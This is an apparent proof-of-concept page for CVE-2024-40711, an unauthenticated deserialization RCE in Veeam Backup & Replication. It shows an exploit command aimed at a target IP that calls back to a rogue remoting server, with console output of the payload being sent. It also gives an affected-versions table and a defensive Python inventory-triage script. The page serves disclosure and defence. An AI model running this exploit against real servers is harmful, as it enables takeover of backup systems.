CVE-2024-40711 PoC — Veeam Backup & Replication Security Vulnerability

Associated Vulnerability
Title: Veeam Backup & Replication Security Vulnerability (CVE-2024-40711)
Description: A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE).
Description
Pre-Auth Exploit for CVE-2024-40711
Readme
# CVE-2024-40711
Exploit for Veeam Backup & Replication Pre-Auth Deserialization CVE-2024-40711

See our [blog post](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/) for technical details.
 



https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70



# PoC in Action


```
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
```

# Florian Hauser
This vulnerability was found by Florian Hauser ([@frycos](https://x.com/frycos)) of CODE WHITE GmbH ([@codewhitesec](https://x.com/codewhitesec)). Make sure to follow his outstanding research; our role was only to recreate and develop the exploit for this issue.

# Affected Versions

| Version            | Status                                                                                       |
|--------------------|----------------------------------------------------------------------------------------------|
| 12.2.0.334         | Fully patched. Not affected by the vulnerabilities in this blogpost.                         |
| 12.1.2.172         | Affected, but exploitation requires authentication. Low privilege users can execute arbitrary code. |
| 12.1.1.56 and earlier | Vulnerable to unauthenticated RCE.                                                         |
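
To triage a backup-server inventory against the table above, the following added example (not part of the watchTowr repository) classifies build numbers and sorts hosts by urgency. The host names and sample CSV are constructed, and two choices are assumptions: builds newer than 12.2.0.334 are treated as patched, and builds that fall between the listed ones are reported as `unlisted` rather than guessed at.

```python
import csv
import io

# Build thresholds copied from the "Affected Versions" table on this page.
UNAUTH_MAX = (12, 1, 1, 56)      # this build and earlier: unauthenticated RCE
AUTH_REQUIRED = (12, 1, 2, 172)  # affected, exploitation needs authentication
PATCHED = (12, 2, 0, 334)        # fully patched
# Most urgent first; used to order the triage report.
SEVERITY = ["unauth-rce", "auth-rce", "unlisted", "unparseable", "patched"]

def parse_build(text):
    """Turn '12.1.1.56' into (12, 1, 1, 56); return None if malformed."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isascii() and p.isdigit() for p in parts):
        return None
    return tuple(int(p) for p in parts)

def classify(build_text):
    build = parse_build(build_text)
    if build is None:
        return "unparseable"      # fix the inventory record, then re-run
    if build <= UNAUTH_MAX:
        return "unauth-rce"
    if build == AUTH_REQUIRED:
        return "auth-rce"
    if build >= PATCHED:
        return "patched"          # assumption: later builds keep the fix
    return "unlisted"             # not in the table: check the vendor KB

def triage(inventory_csv):
    """Return (host, build, status) tuples, most urgent first."""
    rows = csv.DictReader(io.StringIO(inventory_csv))
    found = [(r["host"], r["build"], classify(r["build"])) for r in rows]
    return sorted(found, key=lambda item: SEVERITY.index(item[2]))

# Constructed sample inventory; host names are hypothetical.
SAMPLE = """host,build
bkp-01,12.2.0.334
bkp-02,12.1.2.172
bkp-03,12.1.1.56
bkp-04,12.1.2.100
bkp-05,12.1.2
"""

if __name__ == "__main__":
    for host, build, status in triage(SAMPLE):
        print(f"{host:8} {build:12} {status}")
```

Hosts reported as `unlisted` or `unparseable` should be checked by hand against the vendor advisory (https://www.veeam.com/kb4649) rather than assumed safe.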


# Exploit authors

This exploit was written by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber) 

We'd also like to take the opportunity to thank [Soroush Dalili](https://x.com/irsdl) for his help with this exploit.


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://twitter.com/watchtowrcyber
- https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- https://github.com/codewhitesec/RogueRemotingServer
- https://github.com/tyranid/ExploitRemotingService
- https://www.veeam.com/kb4649